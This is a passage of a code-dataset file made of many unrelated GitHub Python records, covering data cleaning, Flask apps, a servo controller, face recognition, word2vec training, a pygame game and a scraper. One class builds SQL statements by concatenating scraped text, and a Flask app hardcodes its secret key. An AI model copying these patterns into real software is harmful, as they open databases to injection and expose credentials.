open(mkdir+'/'+txt_restore[antnum]+'.txt','w') as file_in:\n with open(mkdir_matlab+'/'+txt_restore[antnum]+'.txt','w') as file_matlab:\n with open(dir,'r')as file_out: # this is the data sources\n file_out.seek(position[antnum],0)\n # for line in file_out:\n while count < THE_RESTORE_NUM:\n line = file_out.readline()\n sample = line.split('\\t')\n cleandata.append(float(sample[0]))\n # file_in.writelines(sample[0]+'\\n')\n # file_matlab.writelines(sample[0]+'\\t'+sample[1]+'\\n')\n count = count + 1\n else :\n position[antnum]= file_out.tell()\n\n cleandata = sorted(cleandata)\n half = THE_RESTORE_NUM//2\n if abs(cleandata[half]-cleandata[-1]) > 3:\n for i in range(half):\n file_in.writelines(str(cleandata[i])+'\\n')\n file_matlab.writelines(str(cleandata[i])+'\\t'+'1'+'\\n')\n else:\n for i in range(half,THE_RESTORE_NUM):\n file_in.writelines(str(cleandata[i])+'\\n')\n file_matlab.writelines(str(cleandata[i])+'\\t'+'1'+'\\n')\n \n cleandata.clear()\n return position \n\n\n\nif __name__==\"__main__\":\n position = dataRestore([0,0,0,0])\n print(position)","repo_name":"HMLG/NISL","sub_path":"Engine/preventFromStrangeValue.py","file_name":"preventFromStrangeValue.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"10565599798","text":"import random\nimport os\n\nprint(\"Welcome to Test Generator\")\n\nprint(\"How many Tests to create for you?\")\ntest_amount = int(input())\n\n# Create list to insert the questions from the txt file\ncontainerQes = []\nwith open(\"soccer_questions.txt\", \"r\") as my_Container:\n for q in my_Container:\n containerQes.append(q)\n\n# Add to each file 4 questions\nfor i in range(test_amount):\n with open(F\"Test{i + 1}.txt\", \"a\") as test_file:\n strQues = ''\n lines = random.sample(containerQes, 4)\n strQues = ''.join(lines)\n test_file.write(strQues)\n test_file.close()\n\ni = 1\nwhile os.path.exists(F\"Test{i}.txt\"):\n print(F\"----Test {i}----\\n\")\n with open(F\"Test{i}.txt\", \"r\") as my_file:\n j = 1\n for line in my_file:\n print(F\"{str(j)}. {line}\")\n j += 1\n i = i + 1\n","repo_name":"netanel152/Python_Tasks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32972344663","text":"from tkinter import Button, PhotoImage\n\nimport const\n\n\nclass Buttons:\n\n def __init__(self):\n self.right_image = PhotoImage(file=\"./images/right.png\")\n self.wrong_image = PhotoImage(file=\"./images/wrong.png\")\n self.right_button = Button(image=self.right_image)\n self.right_button.config(bg=const.BACKGROUND_COLOR, highlightthickness=0, borderwidth=0)\n self.wrong_button = Button(image=self.wrong_image)\n self.wrong_button.config(bg=const.BACKGROUND_COLOR, highlightthickness=0, borderwidth=0)\n\n","repo_name":"yt5ytt/100DaysOfPythonCourse","sub_path":"Day31-FlashCardApp/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5802806851","text":"import digitalio\r\nimport board\r\nimport time\r\n\r\nled = digitalio.DigitalInOut(board.LED)\r\nled.direction = digitalio.Direction.OUTPUT\r\nwhile True:\r\n print(\"On\")\r\n led.value = True\r\n time.sleep(0.5)\r\n print(\"Off\")\r\n led.value = False\r\n time.sleep(0.5)\r\n","repo_name":"hajimef/circuitpython_picow_sample","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7714845210","text":"from flask import Flask, render_template, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\n\r\nJOBS = [\r\n {\"id\": 1, \"title\": \"Data Analyst\", \"location\": \"RJ, Brazil\", \"salary\": \"R$4.000\"},\r\n {\"id\": 2, \"title\": \"Data Scientist\", \"location\": \"BH, Brazil\", \"salary\": \"R$5.000\"},\r\n {\"id\": 3, \"title\": \"Frontend Engineer\", \"location\": \"Remote\", \"salary\": \"R$10.000\"},\r\n {\r\n \"id\": 4,\r\n \"title\": \"Backend Engineer\",\r\n \"location\": \"SP, Brazil\",\r\n \"salary\": \"R$3.000\",\r\n },\r\n {\r\n \"id\": 5,\r\n \"title\": \"Fullstack Developer\",\r\n \"location\": \"SP, Brazil\",\r\n },\r\n]\r\n\r\n\r\n@app.route(\"/\")\r\ndef hello_world():\r\n return render_template(\"home.html\", jobs=JOBS, company=\"Xaropinho\")\r\n\r\n\r\n@app.route(\"/api/jobs\")\r\ndef list_jobs():\r\n return jsonify(JOBS)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host=\"0.0.0.0\", debug=True)\r\n","repo_name":"AntonioMarcel/treinamento-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6236106485","text":"def sudoku2(grid):\n for row in range(9):\n if validRow(grid,row) ==False:\n return False\n for col in range(9):\n if validCol(grid,col) == False:\n return False\n \n for row in range(0,9,3):\n for col in range(0,9,3):\n if validBox(grid,row,col) ==False:\n return False\n return True \n \ndef validRow(grid,row):\n checkList = []\n for i in range(9):\n if grid[row][i] in checkList:\n return False\n elif grid[row][i] !='.':\n checkList.append(grid[row][i])\n return True\n \ndef validCol(grid,col):\n checkList =[]\n for i in range(9):\n if grid[i][col] in checkList:\n return False\n elif grid[i][col] !='.':\n checkList.append(grid[i][col])\n return True\n \ndef validBox(grid,startRow,startCol):\n checkList = []\n for row in range(3):\n for col in range(3):\n boxVal = grid[startRow+row][startCol+col]\n if boxVal in checkList:\n return False\n elif boxVal != '.':\n checkList.append(boxVal)\n return True\n","repo_name":"Zahidsqldba07/sudoku2","sub_path":"sudoku2.py","file_name":"sudoku2.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4653568809","text":"import os\nfrom ast import literal_eval\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef read_info(filename: os.PathLike) -> dict:\n \"\"\"Read volume metadata.\n\n Parameters\n ----------\n filename : PathLike\n Path to the file.\n\n Returns\n -------\n dct : dict\n Dictionary with the metadata.\n \"\"\"\n dct = {}\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n\n if not line:\n continue\n\n if line.startswith('!'):\n continue\n\n key, val = line.split('=')\n\n key = key.strip()\n val = val.strip()\n\n try:\n val = literal_eval(val)\n except ValueError:\n pass\n\n dct[key] = val\n\n return dct\n\n\ndef load_vol(filename: os.PathLike,\n dtype=np.float32,\n mmap_mode: str = None,\n shape: tuple = None) -> np.ndarray:\n \"\"\"Load data from `.vol` file.\n\n The image shape is deduced from the `.vol.info` file. If this file is\n not present, the shape can be specified using the `shape` keyword.\n\n Parameters\n ----------\n filename : os.PathLike\n Path to the file.\n dtype : dtype, optional\n Numpy dtype of the data.\n mmap_mode : None, optional\n If not None, open the file using memory mapping. For more info on\n the modes, see: :func:`numpy.memmap`\n shape : tuple, optional\n Tuple of three ints specifying the shape of the data (order: z, y, x).\n\n Returns\n -------\n result : numpy.ndarray\n Data stored in the file.\n \"\"\"\n filename = Path(filename)\n\n if not filename.exists():\n raise IOError(f'No such file: {filename}')\n\n try:\n filename_info = filename.with_suffix(filename.suffix + '.info')\n if not shape:\n info = read_info(filename_info)\n shape = info['NUM_Z'], info['NUM_Y'], info['NUM_X']\n except FileNotFoundError:\n raise ValueError(\n f'Info file not found: {filename_info.name}, specify '\n 'the volume shape using the `shape` parameter.') from None\n\n result: np.ndarray\n\n if mmap_mode:\n result = np.memmap(filename, dtype=dtype, shape=shape,\n mode=mmap_mode) # type: ignore\n else:\n result = np.fromfile(filename, dtype=dtype)\n result = result.reshape(shape)\n\n return result\n","repo_name":"hpgem/nanomesh","sub_path":"nanomesh/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"27"} +{"seq_id":"17536027147","text":"from flask import Flask, Blueprint, render_template\nfrom flask_wtf import CSRFProtect\n\nfrom views.models import mongo, login_manager\n\nfrom views.auth import auth\nfrom views.errors import errors\n\nimport views.errors as error\n\napp = Flask(__name__)\n\n# Enter your MongoDB URI here.\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/speedApp'\n\napp.config['SECRET_KEY'] = 'jdn4mmyxaIkqjcuYrliR5ojf8Cfi6X'\n\nmongo.init_app(app)\n\nlogin_manager.login_view = 'auth.login'\nlogin_manager.init_app(app)\nCSRFProtect(app)\n\n\napp.register_blueprint(auth)\napp.register_blueprint(errors)\napp.register_error_handler(404,error.page_not_found)\n\n@app.route('/')\ndef index():\n return render_template('auth/index.html')\n\nif __name__ == \"__main__\":\n app.run(debug = True)","repo_name":"mathaimon/flask-mongo-login","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1688995131","text":"#!/usr/bin/env python\nimport rospy\nfrom hexapod_servo.msg import ServoCommand\n\nfrom serial import Serial, SerialException\n\n####################################################################################################\n\nclass ServoController(object):\n\tdef __init__(self):\n\t\trospy.init_node('servo_controller')\n\n\t\ttry:\n\t\t\tself.__serial = Serial('/dev/ttyACM0', 9600)\n\t\t\trospy.sleep(1)\n\n\t\t\t#for i in range(32):\n\t\t\t#\tself.__move(i, 90)\n\n\t\t\t#rospy.sleep(1)\n\t\texcept SerialException as e:\n\t\t\trospy.logfatal(\"Could not open serial port.\")\n\t\t\texit(1)\n\n\t\trospy.Subscriber('direct', ServoCommand, self.move_callback)\n\t\trospy.spin()\n\n\t################################################################################################\n\n\tdef move_callback(self, data):\n\t\tif data.angle < 0 or data.angle > 180:\n\t\t\trospy.logerr('Tried to set servo #' + str(data.index) + ' out of bounds (' + \n\t\t\t\tstr(data.angle) + ' degrees).')\n\t\t\treturn\n\n\t\tself.__move(data.index, data.angle, data.duration)\n\n\t################################################################################################\n\n\tdef __move(self, index, angle, duration = 0.1):\n\t\tmove_string = ServoController.__move_string(index, angle, duration)\n\n\t\tself.__serial.write(move_string)\n\t\tself.__serial.flush()\n\t\trospy.sleep(0.003)\n\n\t################################################################################################\n\n\t@staticmethod\n\tdef __move_string(index, angle, duration):\n\t\tif duration < 0.1:\n\t\t\tduration = 0.1\n\n\t\tpulse_duration = int(((angle / 180.0) * (2500 - 500))) + 500\n\t\tmove_time = int(duration * 1000)\n\n\t\treturn '#' + str(index + 1) + 'P' + str(pulse_duration) + 'T' + str(move_time) + '\\r\\n'\n\n####################################################################################################\n\nif __name__ == '__main__':\n\tServoController()\n","repo_name":"Knifa/HexapodKit","sub_path":"ROS/src/hexapod_hw/scripts/hexapod_hw/servo_controller.py","file_name":"servo_controller.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"de","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"20324360281","text":"\nimport sys\ninput = sys.stdin.readline\n\nN, K = map(int, input().split())\nNS = []\nfor i in range(N):\n NS.append(int(input().strip()))\n\n##\nanswer = 0\nfor i in range(N-1, -1, -1):\n \n if NS[i] <= K:\n answer += K//NS[i]\n K = K%NS[i]\n \n if K == 0:\n break\nprint(answer)","repo_name":"LewisVille-flow/Algorithm_PS","sub_path":"BOJ/11047.py","file_name":"11047.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30875094415","text":"# 1931번 회의실 배정\n'''\nN개의 회의에 대하여 회의실 사용표를 만들려고 한다. \n각 회의 I에 대해 시작시간과 끝나는 시간이 주어져 있고,\n각 회의가 겹치지 않게 하면서 회의실을 사용할 수 있는 회의의 최대 개수를 찾아보자. \n단, 회의는 한번 시작하면 중간에 중단될 수 없으며 한 회의가 끝나는 것과 동시에 다음 회의가 시작될 수 있다.\n회의의 시작시간과 끝나는 시간이 같을 수도 있다. \n'''\n# 접근방법\n'''\n- 시작 시간이 빠른 순으로 정렬한다(heapq?)\n- 반대로 끝나는 시간이 빠른 순으로 정렬하면?\n'''\nimport sys\ninput = sys.stdin.readline\nn = int(input()) # 회의실 수\nclass_ = []\n\nfor _ in range(n):\n start, end = map(int, input().split())\n class_.append((start, end))\nclass_.sort(key = lambda x: (x[1], x[0]))\n# print(class_)\ncnt = 1\ne = class_[0][1]\nfor i in range(1, n):\n # i의 시작시간이 이전 끝나는 시간과 같거나 이후라면,\n if class_[i][0] >= e:\n # 회의 추가해주고, 기존 끝나는 시간을 현 강의의 끝나는 시간으로 바꿔주기\n cnt += 1\n e = class_[i][1]\nprint(cnt)","repo_name":"Choi-jw-96/Algo-","sub_path":"9Week_Free/1931/1931_hany.py","file_name":"1931_hany.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"30243719037","text":"from Classes.SUDBConnect import SUDBConnect\nimport time\nimport re\n\n\nclass InsertCheggLeadArrayIntoCheggLeadsDB(object):\n def __init__(self, cheggLeadArray, fundingClassification, badScholarshipClassification):\n self.cheggLeadArray = cheggLeadArray\n self.fundingClassification = fundingClassification\n self.badScholarshipClassificaion = badScholarshipClassification\n self.db = SUDBConnect()\n self.fileSystemDB = SUDBConnect(destination='filesystem')\n\n self.name = self.cheggLeadArray[0]\n self.url = self.cheggLeadArray[1]\n self.deadline = self.cheggLeadArray[2]\n self.amount = self.cheggLeadArray[3]\n self.eligibility = self.cheggLeadArray[4]\n self.applicationOverview = self.cheggLeadArray[5]\n self.description = self.cheggLeadArray[6]\n self.sponsor = self.cheggLeadArray[7]\n self.sourceWebsite = self.cheggLeadArray[8]\n self.sourceText = self.cheggLeadArray[9]\n self.date = time.strftime('%Y%m%d')\n\n def writeFileToDisk(self):\n tableName = 'CheggLeads'\n user = 'Kya'\n website = re.sub('Leads', '', tableName)\n columns = self.db.getColumnNamesFromTable(tableName)\n currentRow = self.db.getRowsDB(\n \"select * from dbo.CheggLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")[0]\n self.fileSystemDB.writeFile(columns, currentRow, user, website, self.url, self.date)\n\n def checkIfAlreadyInDatabase(self):\n matchingRow = self.db.getRowsDB(\n \"select * from dbo.CheggLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n if matchingRow != []:\n return True\n else:\n return False\n\n def insertUpdateLead(self):\n if not self.checkIfAlreadyInDatabase():\n self.db.insertUpdateOrDeleteDB(\n \"insert into dbo.CheggLeads (Name, Url, Deadline, Amount, Eligibility, ApplicationOverview, Description, Sponsor, SourceWebsite, SourceText, Date, Tag, BadScholarship) values (N'\" + self.name + \"', N'\" + self.url + \"', N'\" + self.deadline + \"', N'\" + self.amount + \"', N'\" + self.eligibility + \"', N'\" + self.applicationOverview + \"', N'\" + self.description + \"', N'\" + self.sponsor + \"', N'\" + self.sourceWebsite + \"', N'\" + self.sourceText + \"', '\" + self.date + \"', '\" + self.fundingClassification + \"', '\" + self.badScholarshipClassificaion + \"')\")\n self.writeFileToDisk()\n return True\n else:\n self.db.insertUpdateOrDeleteDB(\n \"update dbo.CheggLeads set Deadline=N'\" + self.deadline + \"', Amount=N'\" + self.amount + \"', Eligibility=N'\" + self.eligibility + \"', ApplicationOverview=N'\" + self.applicationOverview + \"', Description=N'\" + self.description + \"', Sponsor=N'\" + self.sponsor + \"', SourceWebsite=N'\" + self.sourceWebsite + \"', SourceText=N'\" + self.sourceText + \"', Date='\" + self.date + \"', Tag='\" + self.fundingClassification + \"', BadScholarship='\" + self.badScholarshipClassificaion + \"' where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n self.writeFileToDisk()\n return False\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/InsertCheggLeadArrayIntoCheggLeadsDB.py","file_name":"InsertCheggLeadArrayIntoCheggLeadsDB.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11157655248","text":"import face_recognition\nimport cv2\nimport numpy\nimport time\nimport dlib\nimport imutils\n\n\n# Load the jpg files into numpy arrays\nbiden_image = face_recognition.load_image_file(\"7.jpg\")\nobama2_image = face_recognition.load_image_file(\"5.jpg\")\nobama_image = face_recognition.load_image_file(\"1.jpg\")\nunknown_image = face_recognition.load_image_file(\"2.jpg\")\n\n# Get the face encodings for each face in each image file\n# Since there could be more than one face in each image, it returns a list of encodings.\n# But since I know each image only has one face, I only care about the first encoding in each image, so I grab index 0.\ntry:\n print(time.time())\n biden_face_encoding = face_recognition.face_encodings(biden_image)[0]\n print(time.time())\n obama_face_encoding = face_recognition.face_encodings(obama_image)[0]\n unknown_face_encoding = face_recognition.face_encodings(unknown_image)[1]\nexcept IndexError:\n print(\"I wasn't able to locate any faces in at least one of the images. Check the image files. Aborting...\")\n quit()\n\nknown_faces = [\n biden_face_encoding,\n obama_face_encoding\n]\n\ndetector = dlib.get_frontal_face_detector()\n\nimg_raw = biden_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\nrgb_small_frame = small_frame[:, :, ::-1]\nprint(time.time())\nfaces = face_recognition.face_locations(rgb_small_frame)\nprint(time.time())\nprint(faces)\n#-------------------\nprint('---------')\nprint(time.time())\nimg_raw = biden_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\ngray = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)\nrects = detector(gray, 1)\nprint(time.time())\nprint(rects)\n\nprint(time.time())\nface_encodings = face_recognition.face_encodings(rgb_small_frame, faces)\nprint(time.time())\n\n#-------------------\nprint('---------')\nprint(time.time())\nimg_raw = obama2_image\nsmall_frame = cv2.resize(img_raw, (0, 0), fx=0.25, fy=0.25)\ngray = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)\nrects = detector(gray, 1)\nprint(time.time())\nprint(rects)\n\nprint(time.time())\nface_encodings = face_recognition.face_encodings(rgb_small_frame, faces)\nprint(time.time())\n# results is an array of True/False telling if the unknown face matched anyone in the known_faces array\nresults = face_recognition.compare_faces(known_faces, unknown_face_encoding)\nprint(results)\n\nprint(\"Is the unknown face a picture of Biden? {}\".format(results[0]))\nprint(\"Is the unknown face a picture of Obama? {}\".format(results[1]))\nprint(\"Is the unknown face a new person that we've never seen before? {}\".format(not True in results))\n","repo_name":"linchiyu/learning","sub_path":"face_recognition/facerecog/testfr.py","file_name":"testfr.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41177936990","text":"import sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as tud\nfrom torch.nn.parameter import Parameter\n\nfrom collections import Counter\nimport numpy as np\nimport random\nimport math\n\nimport pandas as pd\nimport scipy\nimport sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# this parameter decides whehter this code runs on GPU or CPU\n# the speed of CPU is slower than GPU\nUSE_CUDA = torch.cuda.is_available()\n\n# 为了保证复现,random seed固定\nrandom.seed(53113)\nnp.random.seed(53113)\ntorch.manual_seed(53113)\nif USE_CUDA:\n torch.cuda.manual_seed(53113)\n\n# 超参数\n# 一个正样本对应100个负样本\nK = 100 # number of negative samples\n#窗口大小\nC = 3 # nearby words threshold\nNUM_EPOCHS = 2 # The number of epochs of training\n#取3万个高频单词,不需要所有词汇都学习\nMAX_VOCAB_SIZE = 30000 # the vocabulary size\nBATCH_SIZE = 128 # the batch size\nLEARNING_RATE = 0.2 # the initial learning rate\nEMBEDDING_SIZE = 100\n\nLOG_FILE = \"./log/word-embedding.log\"\n\n# 分词\ndef word_tokenize(text):\n return text.split()\n\nwith open(\"./data/text8\", \"r\") as fin:\n text = fin.read()\n\ntext = [w for w in word_tokenize(text.lower())]\n\nvocab = dict(Counter(text).most_common(MAX_VOCAB_SIZE - 1))\n# 所有低频词用unk表示\nvocab[\"\"] = len(text) - np.sum(list(vocab.values()))\n#将单词id化\nidx_to_word = [word for word in vocab.keys()]\nword_to_idx = {word: i for i, word in enumerate(idx_to_word)}\n# 计算单词词频,为后面负采样做准备\nword_counts = np.array([count for count in vocab.values()], dtype=np.float32)\nword_freqs = word_counts / np.sum(word_counts)\nword_freqs = word_freqs ** (3. / 4.)\nword_freqs = word_freqs / np.sum(word_freqs) # 用来做 negative sampling\nVOCAB_SIZE = len(idx_to_word)\n\nprint(VOCAB_SIZE)\n\nclass WordEmbeddingDataset(tud.Dataset):\n def __init__(self, text, word_to_idx, idx_to_word, word_freqs, word_counts):\n ''' text: a list of words, all text from the training dataset\n word_to_idx: the dictionary from word to idx\n idx_to_word: idx to word mapping\n word_freq: the frequency of each word\n word_counts: the word counts\n '''\n super(WordEmbeddingDataset, self).__init__()\n self.text_encoded = [word_to_idx.get(t, VOCAB_SIZE - 1) for t in text]\n self.text_encoded = torch.Tensor(self.text_encoded).long()\n self.word_to_idx = word_to_idx\n self.idx_to_word = idx_to_word\n self.word_freqs = torch.Tensor(word_freqs)\n self.word_counts = torch.Tensor(word_counts)\n\n def __len__(self):\n ''' 返回整个数据集(所有单词)的长度\n '''\n return len(self.text_encoded)\n\n def __getitem__(self, idx):\n ''' 这个function返回以下数据用于训练\n - 中心词\n - 这个单词附近的(positive)单词\n - 随机采样的K个单词作为negative sample\n '''\n center_word = self.text_encoded[idx]\n # C是窗口大小\n pos_indices = list(range(idx - C, idx)) + list(range(idx + 1, idx + C + 1))\n # 对i求余数的原因是最左边可能是负数,因为如果中心词是第一个的话\n pos_indices = [i % len(self.text_encoded) for i in pos_indices]\n # 对text编码,即往tensor去映射\n pos_words = self.text_encoded[pos_indices]\n # 根据单词频率随机取负样本,每个正样本取K个负样本\n neg_words = torch.multinomial(self.word_freqs, K * pos_words.shape[0], True)\n\n return center_word, pos_words, neg_words\n\ndataset = WordEmbeddingDataset(text, word_to_idx, idx_to_word, word_freqs, word_counts)\ndataloader = tud.DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)\n\nclass EmbeddingModel(nn.Module):\n def __init__(self, vocab_size, embed_size):\n ''' 初始化输出和输出embedding\n '''\n super(EmbeddingModel, self).__init__()\n self.vocab_size = vocab_size\n self.embed_size = embed_size\n\n initrange = 0.5 / self.embed_size\n self.out_embed = nn.Embedding(self.vocab_size, self.embed_size, sparse=False)\n self.out_embed.weight.data.uniform_(-initrange, initrange)\n\n self.in_embed = nn.Embedding(self.vocab_size, self.embed_size, sparse=False)\n self.in_embed.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, input_labels, pos_labels, neg_labels):\n '''\n input_labels: 中心词, [batch_size]\n pos_labels: 中心词周围 context window 出现过的单词 [batch_size * (window_size * 2)]\n neg_labelss: 中心词周围没有出现过的单词,从 negative sampling 得到 [batch_size, (window_size * 2 * K)]\n\n return: loss\n '''\n\n input_embedding = self.in_embed(input_labels) # B * embed_size\n pos_embedding = self.out_embed(pos_labels) # B * (2*C) * embed_size\n neg_embedding = self.out_embed(neg_labels) # B * (2*C * K) * embed_size\n print(\"input_embedding size:\", input_embedding.size())\n print(\"pos_embedding size:\", pos_embedding.size())\n print(\"neg_embedding size:\", neg_embedding.size())\n # 通过unsqueeze强行增加了一个第三维度(0是行,1是列,2是第三个维度),维度相同,后面才能进行求和计算\n log_pos = torch.bmm(pos_embedding, input_embedding.unsqueeze(2)).squeeze() # B * (2*C)\n log_neg = torch.bmm(neg_embedding, -input_embedding.unsqueeze(2)).squeeze() # B * (2*C*K)\n print(\"log_pos size:\", log_pos.size())\n print(\"log_neg size:\", log_neg.size())\n log_pos = F.logsigmoid(log_pos).sum(1)\n log_neg = F.logsigmoid(log_neg).sum(1)\n\n loss = log_pos + log_neg\n print(\"log_pos size:\", log_pos.size())\n print(\"log_neg size:\", log_neg.size())\n print(\"loss size:\", loss.size())\n sys.exit()\n\n # 计算负对数释然\n return -loss\n\n def input_embeddings(self):\n return self.in_embed.weight.data.cpu().numpy()\n\nmodel = EmbeddingModel(VOCAB_SIZE, EMBEDDING_SIZE)\nif USE_CUDA:\n model = model.cuda()\n\ndef evaluate(filename, embedding_weights):\n if filename.endswith(\".csv\"):\n data = pd.read_csv(filename, sep=\",\")\n else:\n data = pd.read_csv(filename, sep=\"\\t\")\n human_similarity = []\n model_similarity = []\n for i in data.iloc[:, 0:2].index:\n word1, word2 = data.iloc[i, 0], data.iloc[i, 1]\n if word1 not in word_to_idx or word2 not in word_to_idx:\n continue\n else:\n word1_idx, word2_idx = word_to_idx[word1], word_to_idx[word2]\n word1_embed, word2_embed = embedding_weights[[word1_idx]], embedding_weights[[word2_idx]]\n model_similarity.append(float(sklearn.metrics.pairwise.cosine_similarity(word1_embed, word2_embed)))\n human_similarity.append(float(data.iloc[i, 2]))\n\n return scipy.stats.spearmanr(human_similarity, model_similarity)# , model_similarity\n\ndef find_nearest(word):\n index = word_to_idx[word]\n embedding = embedding_weights[index]\n cos_dis = np.array([scipy.spatial.distance.cosine(e, embedding) for e in embedding_weights])\n return [idx_to_word[i] for i in cos_dis.argsort()[:10]]\n\n\nif __name__ == '__main__':\n\n optimizer = torch.optim.SGD(model.parameters(), lr=LEARNING_RATE)\n for e in range(NUM_EPOCHS):\n for i, (input_labels, pos_labels, neg_labels) in enumerate(dataloader):\n\n # print(input_labels.size()) # [128]\n # print(pos_labels.size()) # [128, 6]\n # print(neg_labels.size()) # [128, 600]\n\n input_labels = input_labels.long()\n pos_labels = pos_labels.long()\n neg_labels = neg_labels.long()\n if USE_CUDA:\n input_labels = input_labels.cuda()\n pos_labels = pos_labels.cuda()\n neg_labels = neg_labels.cuda()\n\n optimizer.zero_grad()\n loss = model(input_labels, pos_labels, neg_labels).mean()\n loss.backward()\n optimizer.step()\n\n if i % 100 == 0:\n with open(LOG_FILE, \"a\") as fout:\n fout.write(\"epoch: {}, iter: {}, loss: {}\\n\".format(e, i, loss.item()))\n print(\"epoch: {}, iter: {}, loss: {}\".format(e, i, loss.item()))\n # 保存embedding\n embedding_weights = model.input_embeddings()\n torch.save(model.state_dict(), \"embedding-{}.th\".format(EMBEDDING_SIZE))","repo_name":"qiuxianghu88/Deep-Learning-and-Neural-Network","sub_path":"word2vec/word2vec_skipgram.py","file_name":"word2vec_skipgram.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6298283140","text":"# one to read thought later\n\ndelta_force = [complex(x,y) for x in (-1,0,1) for y in (-1,0,1) if not x==y==0]\n\ndef neighbors(floor,loc,queen):\n for delta in delta_force:\n nloc = loc + delta\n while queen and nloc in floor and floor[nloc] == '.': nloc = nloc + delta\n if nloc in floor and floor[nloc]=='#': yield 1\n\ndef part(p, new_floor, floor = None):\n while floor != new_floor:\n floor = new_floor.copy()\n for loc in ( x for x in floor if floor[x] != '.' ):\n n = sum(neighbors(floor,loc,p))\n if n > (3+p): new_floor[loc] = 'L'\n elif n == 0: new_floor[loc] = '#'\n print(f'part {p+1}: {sum(cell==\"#\" for cell in new_floor.values())}')\n\nlines = ( list(s.strip()) for s in open(day_11_path).readlines() )\nlines = { complex(x,y): cell for x,row in enumerate(lines) for y,cell in enumerate(row) }\npart(0,lines.copy())\n\npart(1,lines.copy())\n","repo_name":"mrzarquon/advent2020","sub_path":"day11/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13130619711","text":"import pygame\nimport actualizar\nfrom constantes import *\nfrom sonidos import *\nfrom objetos import *\n\npygame.init()\n\npantalla_juego = pygame.display.set_mode((ANCHO_PANTALLA, ALTO_PANTALLA+100))\npygame.display.set_caption('The Simpsons Memotest')\n\nsegundo = pygame.USEREVENT + 0\npygame.time.set_timer(segundo,1000)\n\ntiempo_de_inicio = pygame.USEREVENT + 1\npygame.time.set_timer(tiempo_de_inicio,3000)\n\ntablero_juego = Tablero()\ntextos_juego = Texto()\nimagen_juego = Imagen()\n\nsonido_fondo.play(-1)\n\nsegundos = 0\nminutos = 0\nrunning = True\njuego_iniciado = False\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n \n if juego_iniciado:\n if event.type == pygame.MOUSEBUTTONDOWN :\n tablero_juego.colision(event.pos)\n \n if not tablero_juego.verificar_juego_terminado():\n if event.type == segundo:\n segundos += 1\n if segundos == 60:\n minutos += 1\n segundos = 0\n \n else:\n if event.type == tiempo_de_inicio:\n juego_iniciado = True\n\n for tarjeta in tablero_juego.lista_tarjetas:\n tarjeta.visible = not juego_iniciado \n \n tablero_juego.update()\n pantalla_juego.blit(imagen_juego.juego_iniciado,(0,0))\n textos_juego.actualizar_tiempo(minutos, segundos)\n actualizar.render(tablero_juego, pantalla_juego, textos_juego)\n\n pygame.display.flip()\n\npygame.quit()","repo_name":"MauricioUno/Primer-Cuatrimestre-UnoMauricio","sub_path":"Programas Pygame/clase_16 POO/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27657367343","text":"import sys, getopt, requests, urllib, csv, time\nfrom fake_useragent import UserAgent\nfrom xml.etree import ElementTree\n\ndef main(argv):\n state, city = parse_args(argv)\n\n region_id = '12447' # 